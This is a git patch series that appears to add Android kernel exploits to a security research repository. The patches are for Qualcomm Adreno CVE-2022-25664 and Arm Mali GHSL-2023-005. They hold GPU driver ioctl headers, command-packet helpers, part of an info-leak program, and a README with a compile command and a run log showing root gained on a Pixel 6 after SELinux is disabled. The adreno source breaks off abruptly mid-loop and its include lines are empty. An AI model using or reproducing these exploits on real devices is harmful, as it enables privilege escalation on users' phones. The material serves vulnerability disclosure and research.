+/* private: reserved for future use */
+ unsigned int __pad[3];
+};
+
+#define IOCTL_KGSL_SYNCSOURCE_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x40, struct kgsl_syncsource_create)
+
+struct kgsl_syncsource_create_fence {
+ unsigned int id;
+ int fence_fd;
+/* private: reserved for future use */
+ unsigned int __pad[4];
+};
+
+/**
+ * struct kgsl_syncsource_signal_fence - Argument to
+ * IOCTL_KGSL_SYNCSOURCE_SIGNAL_FENCE
+ * @id: syncsource id
+ * @fence_fd: sync_fence fd to signal
+ *
+ * Signal a fence that was created by a IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE
+ * call using the same syncsource id. This allows a fence to be shared
+ * to other processes but only signaled by the process owning the fd
+ * used to create the fence.
+ */
+#define IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE \
+ _IOWR(KGSL_IOC_TYPE, 0x42, struct kgsl_syncsource_create_fence)
+
+int kgsl_ctx_create(int fd, uint32_t *ctx_id);
+int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size);
+int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly);
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
new file mode 100644
index 0000000..7224cc6
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
@@ -0,0 +1,218 @@
+#ifndef ADRENO_H
+#define ADRENO_H
+
+#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U
+
+enum kgsl_user_mem_type {
+ KGSL_USER_MEM_TYPE_PMEM = 0x00000000,
+ KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
+ KGSL_USER_MEM_TYPE_ADDR = 0x00000002,
+ KGSL_USER_MEM_TYPE_ION = 0x00000003,
+ KGSL_USER_MEM_TYPE_DMABUF = 0x00000003,
+ KGSL_USER_MEM_TYPE_MAX = 0x00000007,
+};
+
+struct kgsl_command_object {
+ uint64_t offset;
+ uint64_t gpuaddr;
+ uint64_t size;
+ unsigned int flags;
+ unsigned int id;
+};
+
+struct kgsl_gpu_command {
+ uint64_t flags;
+ uint64_t __user cmdlist;
+ unsigned int cmdsize;
+ unsigned int numcmds;
+ uint64_t __user objlist;
+ unsigned int objsize;
+ unsigned int numobjs;
+ uint64_t __user synclist;
+ unsigned int syncsize;
+ unsigned int numsyncs;
+ unsigned int context_id;
+ unsigned int timestamp;
+};
+
+struct kgsl_map_user_mem {
+ int fd;
+ unsigned long gpuaddr; /*output param */
+ size_t len;
+ size_t offset;
+ unsigned long hostptr; /*input param */
+ enum kgsl_user_mem_type memtype;
+ unsigned int flags;
+};
+
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+
+#define KGSL_IOC_TYPE 0x09
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+#define IOCTL_KGSL_MAP_USER_MEM \
+ _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)
+
+#define IOCTL_KGSL_GPU_COMMAND \
+ _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command)
+
+#define KGSL_CMDLIST_IB 0x00000001U
+#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
+
+#define CP_TYPE4_PKT (4 << 28)
+#define CP_TYPE7_PKT (7 << 28)
+
+#define CP_NOP 0x10
+#define CP_WAIT_FOR_ME 0x13
+#define CP_WAIT_FOR_IDLE 0x26
+#define CP_WAIT_REG_MEM 0x3c
+#define CP_MEM_WRITE 0x3d
+#define CP_INDIRECT_BUFFER_PFE 0x3f
+#define CP_SET_DRAW_STATE 0x43
+#define CP_MEM_TO_MEM 0x73
+#define CP_SET_PROTECTED_MODE 0x5f
+
+#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
+#define lower_32_bits(n) ((uint32_t)(n))
+
+
+#define PT_BASE 0xfc000000
+#define KGSL_OBJLIST_MEMOBJ 0x00000008U
+#define KGSL_OBJLIST_PROFILE 0x00000010U
+#define KGSL_DRAWOBJ_PROFILING 0x00000010
+#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31)
+
+struct kgsl_device_getproperty {
+ unsigned int type;
+ void *value;
+ size_t sizebytes;
+};
+
+#define IOCTL_KGSL_DEVICE_GETPROPERTY \
+ _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty)
+
+
+struct kgsl_gpumem_alloc_id {
+ unsigned int id;
+ unsigned int flags;
+ uint64_t size;
+ uint64_t mmapsize;
+ unsigned long gpuaddr;
+};
+
+struct kgsl_gpumem_free_id {
+ unsigned int id;
+};
+
+#define IOCTL_KGSL_GPUMEM_ALLOC_ID \
+ _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id)
+
+struct kgsl_sharedmem_free {
+ unsigned long gpuaddr;
+};
+
+#define IOCTL_KGSL_SHAREDMEM_FREE \
+ _IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free)
+
+static inline uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr)
+{
+ uint *start = cmds;
+
+ *cmds++ = lower_32_bits(gpuaddr);
+ *cmds++ = upper_32_bits(gpuaddr);
+
+ return cmds - start;
+}
+
+static inline uint pm4_calc_odd_parity_bit(uint val) {
+ return (0x9669 >> (0xf & ((val) ^
+ ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^
+ ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^
+ ((val) >> 28)))) & 1;
+}
+
+static inline uint cp_type7_packet(uint opcode, uint cnt) {
+ return CP_TYPE7_PKT | ((cnt) << 0) |
+ (pm4_calc_odd_parity_bit(cnt) << 15) |
+ (((opcode) & 0x7F) << 16) |
+ ((pm4_calc_odd_parity_bit(opcode) << 23));
+}
+
+static inline uint cp_wait_for_me(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0);
+
+ return cmds - start;
+}
+
+static inline uint cp_mem_packet(int opcode, uint size, uint num_mem) {
+ return cp_type7_packet(opcode, size + num_mem);
+}
+
+static inline uint cp_wait_for_idle(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0);
+
+ return cmds - start;
+}
+
+static inline int _adreno_iommu_add_idle_indirect_cmds(
+ unsigned int *cmds)
+{
+ unsigned int *start = cmds;
+ cmds += cp_wait_for_me(cmds);
+ *cmds++ = cp_mem_packet(CP_INDIRECT_BUFFER_PFE, 2, 1);
+ cmds += cp_gpuaddr(cmds, 0xfc000000+1024);
+ *cmds++ = 2;
+ cmds += cp_wait_for_idle(cmds);
+ return cmds - start;
+}
+
+static inline uint cp_type4_packet(uint opcode, uint cnt)
+{
+ return CP_TYPE4_PKT | ((cnt) << 0) |
+ (pm4_calc_odd_parity_bit(cnt) << 7) |
+ (((opcode) & 0x3FFFF) << 8) |
+ ((pm4_calc_odd_parity_bit(opcode) << 27));
+}
+
+static inline uint cp_register(
+ unsigned int reg, unsigned int size)
+{
+ return cp_type4_packet(reg, size);
+}
+
+static inline uint cp_invalidate_state(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3);
+ *cmds++ = 0x40000;
+ *cmds++ = 0;
+ *cmds++ = 0;
+
+ return cmds - start;
+}
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
new file mode 100644
index 0000000..ba980e8
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
@@ -0,0 +1,221 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "adreno.h"
+
+#define LEAK_SIZE 100
+
+#define COMMAND_SIZE 4
+
+static void hexdump(void *_data, size_t byte_count) {
+ printf("hexdump(%p, 0x%lx)\n", _data, (uint64_t)byte_count);
+ for (uint64_t byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
+ unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
+ uint64_t line_bytes = (byte_count - byte_offset > 16) ?
+ 16 : (byte_count - byte_offset);
+ char line[1000];
+ char *linep = line;
+ linep += sprintf(linep, "%08lx ", byte_offset);
+ for (int i=0; i<16; i++) {
+ if (i >= line_bytes) {
+ linep += sprintf(linep, " ");
+ } else {
+ linep += sprintf(linep, "%02hhx ", bytes[i]);
+ }
+ }
+ linep += sprintf(linep, " |");
+ for (int i=0; i
Date: Tue, 21 Feb 2023 11:53:35 +0000
Subject: [PATCH 08/53] Initial commit
---
.../Android/Mali/GHSL-2023-005/README.md | 39 +
.../Android/Mali/GHSL-2023-005/mali.h | 1060 ++++++++++++++
.../Mali/GHSL-2023-005/mali_base_jm_kernel.h | 1216 +++++++++++++++++
.../Android/Mali/GHSL-2023-005/mali_jit.c | 659 +++++++++
.../Android/Mali/GHSL-2023-005/midgard.h | 260 ++++
5 files changed, 3234 insertions(+)
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/README.md
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/mali.h
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/README.md b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
new file mode 100644
index 0000000..76a9978
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
@@ -0,0 +1,39 @@
+## Exploit for GHSL-2023-005
+
+The write up can be found [here](). A security patch from the upstream Arm Mali driver somehow got missed out in the update for the Pixel phones and I reported it to Google in January 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit is tested on the Google Pixel 6 for devices running the January 2023 patch. For reference, I used the following command to compile it with clang in ndk-21:
+
+```
+android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_jit.c -o mali_jit
+```
+
+The exploit should be run a couple of minutes after boot and should be fairly reliable. If failed, it can be rerun and should succeed within a few times.
+If successful, it should disable SELinux and gain root.
+
+```
+oriole:/ $ /data/local/tmp/mali_jit
+fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
+region freed
+found region 16115 at 7000200000
+overwrite addr : 7ae9700710 710
+overwrite addr : 7ae9500710 710
+overwrite addr : 7828500710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828500710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828100710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828100710 710
+overwrite addr : 7ae9700fd4 fd4
+overwrite addr : 7ae9500fd4 fd4
+overwrite addr : 7828500fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828500fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828100fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828100fd4 fd4
+result 50
+oriole:/ #
+```
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h b/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h
new file mode 100644
index 0000000..3b61e20
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h
@@ -0,0 +1,1060 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_JM_IOCTL_H_
+#define _UAPI_KBASE_JM_IOCTL_H_
+
+#include
+#include
+
+/*
+ * 11.1:
+ * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
+ * 11.2:
+ * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
+ * which some user-side clients prior to 11.2 might fault if they received
+ * them
+ * 11.3:
+ * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
+ * KBASE_IOCTL_STICKY_RESOURCE_UNMAP
+ * 11.4:
+ * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
+ * 11.5:
+ * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
+ * 11.6:
+ * - Added flags field to base_jit_alloc_info structure, which can be used to
+ * specify pseudo chunked tiler alignment for JIT allocations.
+ * 11.7:
+ * - Removed UMP support
+ * 11.8:
+ * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
+ * 11.9:
+ * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
+ * under base_mem_alloc_flags
+ * 11.10:
+ * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
+ * JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
+ * with one softjob.
+ * 11.11:
+ * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
+ * 11.12:
+ * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
+ * 11.13:
+ * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
+ * 11.14:
+ * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
+ * under base_mem_alloc_flags
+ * 11.15:
+ * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
+ * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
+ * passed to mmap().
+ * 11.16:
+ * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
+ * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
+ * dma-buf. Now, buffers are mapped on GPU when first imported, no longer
+ * requiring external resource or sticky resource tracking. UNLESS,
+ * CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
+ * 11.17:
+ * - Added BASE_JD_REQ_JOB_SLOT.
+ * - Reused padding field in base_jd_atom_v2 to pass job slot number.
+ * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
+ * 11.18:
+ * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
+ * 11.19:
+ * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
+ * 11.20:
+ * - Added new phys_pages member to kbase_ioctl_mem_jit_init for
+ * KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
+ * (replacing '_OLD') and _11_5 suffixes
+ * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
+ * base_jd_atom_v2. It must currently be initialized to zero.
+ * - Added heap_info_gpu_addr to base_jit_alloc_info, and
+ * BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
+ * flags member. Previous variants of this structure are kept and given _10_2
+ * and _11_5 suffixes.
+ * - The above changes are checked for safe values in usual builds
+ * 11.21:
+ * - v2.0 of mali_trace debugfs file, which now versions the file separately
+ * 11.22:
+ * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
+ * KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
+ * 11.23:
+ * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
+ * the physical memory backing of JIT allocations. This was not supposed
+ * to be a valid use case, but it was allowed by the previous implementation.
+ * 11.24:
+ * - Added a sysfs file 'serialize_jobs' inside a new sub-directory
+ * 'scheduling'.
+ * 11.25:
+ * - Enabled JIT pressure limit in base/kbase by default
+ * 11.26
+ * - Added kinstr_jm API
+ * 11.27
+ * - Backwards compatible extension to HWC ioctl.
+ * 11.28:
+ * - Added kernel side cache ops needed hint
+ * 11.29:
+ * - Reserve ioctl 52
+ * 11.30:
+ * - Add a new priority level BASE_JD_PRIO_REALTIME
+ * - Add ioctl 54: This controls the priority setting.
+ * 11.31:
+ * - Added BASE_JD_REQ_LIMITED_CORE_MASK.
+ * - Added ioctl 55: set_limited_core_count.
+ */
+#define BASE_UK_VERSION_MAJOR 11
+#define BASE_UK_VERSION_MINOR 31
+
+/**
+ * struct kbase_ioctl_version_check - Check version compatibility between
+ * kernel and userspace
+ *
+ * @major: Major version number
+ * @minor: Minor version number
+ */
+struct kbase_ioctl_version_check {
+ __u16 major;
+ __u16 minor;
+};
+
+#define KBASE_IOCTL_VERSION_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)
+
+
+/**
+ * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel
+ *
+ * @addr: Memory address of an array of struct base_jd_atom_v2 or v3
+ * @nr_atoms: Number of entries in the array
+ * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom)
+ */
+struct kbase_ioctl_job_submit {
+ __u64 addr;
+ __u32 nr_atoms;
+ __u32 stride;
+};
+
+#define KBASE_IOCTL_JOB_SUBMIT \
+ _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)
+
+#define KBASE_IOCTL_POST_TERM \
+ _IO(KBASE_IOCTL_TYPE, 4)
+
+/**
+ * struct kbase_ioctl_soft_event_update - Update the status of a soft-event
+ * @event: GPU address of the event which has been updated
+ * @new_status: The new status to set
+ * @flags: Flags for future expansion
+ */
+struct kbase_ioctl_soft_event_update {
+ __u64 event;
+ __u32 new_status;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_SOFT_EVENT_UPDATE \
+ _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update)
+
+/**
+ * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for
+ * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the
+ * kernel
+ *
+ * @size: The size of the `struct kbase_kinstr_jm_atom_state_change`
+ * @version: Represents a breaking change in the
+ * `struct kbase_kinstr_jm_atom_state_change`
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ *
+ * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the
+ * end of the structure that older user space might not understand. If the
+ * `version` is the same, the structure is still compatible with newer kernels.
+ * The `size` can be used to cast the opaque memory returned from the kernel.
+ */
+struct kbase_kinstr_jm_fd_out {
+ __u16 size;
+ __u8 version;
+ __u8 padding[5];
+};
+
+/**
+ * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor
+ *
+ * @count: Number of atom states that can be stored in the kernel circular
+ * buffer. Must be a power of two
+ * @padding: Explicit padding to get the structure up to 64bits. See
+ * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst
+ */
+struct kbase_kinstr_jm_fd_in {
+ __u16 count;
+ __u8 padding[6];
+};
+
+union kbase_kinstr_jm_fd {
+ struct kbase_kinstr_jm_fd_in in;
+ struct kbase_kinstr_jm_fd_out out;
+};
+
+#define KBASE_IOCTL_KINSTR_JM_FD \
+ _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd)
+
+
+#define KBASE_IOCTL_VERSION_CHECK_RESERVED \
+ _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)
+
+#define KBASE_IOCTL_TYPE 0x80
+
+/**
+ * struct kbase_ioctl_set_flags - Set kernel context creation flags
+ *
+ * @create_flags: Flags - see base_context_create_flags
+ */
+struct kbase_ioctl_set_flags {
+ __u32 create_flags;
+};
+
+#define KBASE_IOCTL_SET_FLAGS \
+ _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)
+
+/**
+ * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel
+ *
+ * @buffer: Pointer to the buffer to store properties into
+ * @size: Size of the buffer
+ * @flags: Flags - must be zero for now
+ *
+ * The ioctl will return the number of bytes stored into @buffer or an error
+ * on failure (e.g. @size is too small). If @size is specified as 0 then no
+ * data will be written but the return value will be the number of bytes needed
+ * for all the properties.
+ *
+ * @flags may be used in the future to request a different format for the
+ * buffer. With @flags == 0 the following format is used.
+ *
+ * The buffer will be filled with pairs of values, a __u32 key identifying the
+ * property followed by the value. The size of the value is identified using
+ * the bottom bits of the key. The value then immediately followed the key and
+ * is tightly packed (there is no padding). All keys and values are
+ * little-endian.
+ *
+ * 00 = __u8
+ * 01 = __u16
+ * 10 = __u32
+ * 11 = __u64
+ */
+struct kbase_ioctl_get_gpuprops {
+ __u64 buffer;
+ __u32 size;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_GET_GPUPROPS \
+ _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops)
+
+/**
+ * union kbase_ioctl_mem_alloc - Allocate memory on the GPU
+ * @in: Input parameters
+ * @in.va_pages: The number of pages of virtual address space to reserve
+ * @in.commit_pages: The number of physical pages to allocate
+ * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region
+ * @in.flags: Flags
+ * @out: Output parameters
+ * @out.flags: Flags
+ * @out.gpu_va: The GPU virtual address which is allocated
+ */
+union kbase_ioctl_mem_alloc {
+ struct {
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u64 flags;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALLOC \
+ _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)
+
+/**
+ * struct kbase_ioctl_mem_query - Query properties of a GPU memory region
+ * @in: Input parameters
+ * @in.gpu_addr: A GPU address contained within the region
+ * @in.query: The type of query
+ * @out: Output parameters
+ * @out.value: The result of the query
+ *
+ * Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
+ */
+union kbase_ioctl_mem_query {
+ struct {
+ __u64 gpu_addr;
+ __u64 query;
+ } in;
+ struct {
+ __u64 value;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_QUERY \
+ _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query)
+
+#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1)
+#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2)
+#define KBASE_MEM_QUERY_FLAGS ((__u64)3)
+
+/**
+ * struct kbase_ioctl_mem_free - Free a memory region
+ * @gpu_addr: Handle to the region to free
+ */
+struct kbase_ioctl_mem_free {
+ __u64 gpu_addr;
+};
+
+#define KBASE_IOCTL_MEM_FREE \
+ _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)
+
+/**
+ * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader
+ * @buffer_count: requested number of dumping buffers
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ *
+ * A fd is returned from the ioctl if successful, or a negative value on error
+ */
+struct kbase_ioctl_hwcnt_reader_setup {
+ __u32 buffer_count;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_READER_SETUP \
+ _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup)
+
+/**
+ * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection
+ * @dump_buffer: GPU address to write counters to
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ */
+struct kbase_ioctl_hwcnt_enable {
+ __u64 dump_buffer;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_ENABLE \
+ _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable)
+
+#define KBASE_IOCTL_HWCNT_DUMP \
+ _IO(KBASE_IOCTL_TYPE, 10)
+
+#define KBASE_IOCTL_HWCNT_CLEAR \
+ _IO(KBASE_IOCTL_TYPE, 11)
+
+/**
+ * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to.
+ * @data: Counter samples for the dummy model.
+ * @size: Size of the counter sample data.
+ * @padding: Padding.
+ */
+struct kbase_ioctl_hwcnt_values {
+ __u64 data;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_HWCNT_SET \
+ _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values)
+
+/**
+ * struct kbase_ioctl_disjoint_query - Query the disjoint counter
+ * @counter: A counter of disjoint events in the kernel
+ */
+struct kbase_ioctl_disjoint_query {
+ __u32 counter;
+};
+
+#define KBASE_IOCTL_DISJOINT_QUERY \
+ _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query)
+
+/**
+ * struct kbase_ioctl_get_ddk_version - Query the kernel version
+ * @version_buffer: Buffer to receive the kernel version string
+ * @size: Size of the buffer
+ * @padding: Padding
+ *
+ * The ioctl will return the number of bytes written into version_buffer
+ * (which includes a NULL byte) or a negative error code
+ *
+ * The ioctl request code has to be _IOW because the data in ioctl struct is
+ * being copied to the kernel, even though the kernel then writes out the
+ * version info to the buffer specified in the ioctl.
+ */
+struct kbase_ioctl_get_ddk_version {
+ __u64 version_buffer;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_GET_DDK_VERSION \
+ _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 10.2--11.4)
+ * @va_pages: Number of VA pages to reserve for JIT
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_10_2 {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 11.5--11.19)
+ * @va_pages: Number of VA pages to reserve for JIT
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_11_5 {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5)
+
+/**
+ * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory
+ * allocator
+ * @va_pages: Number of GPU virtual address pages to reserve for just-in-time
+ * memory allocations
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ * @phys_pages: Maximum number of physical pages to allocate just-in-time
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ */
+struct kbase_ioctl_mem_jit_init {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+ __u64 phys_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init)
+
+/**
+ * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory
+ *
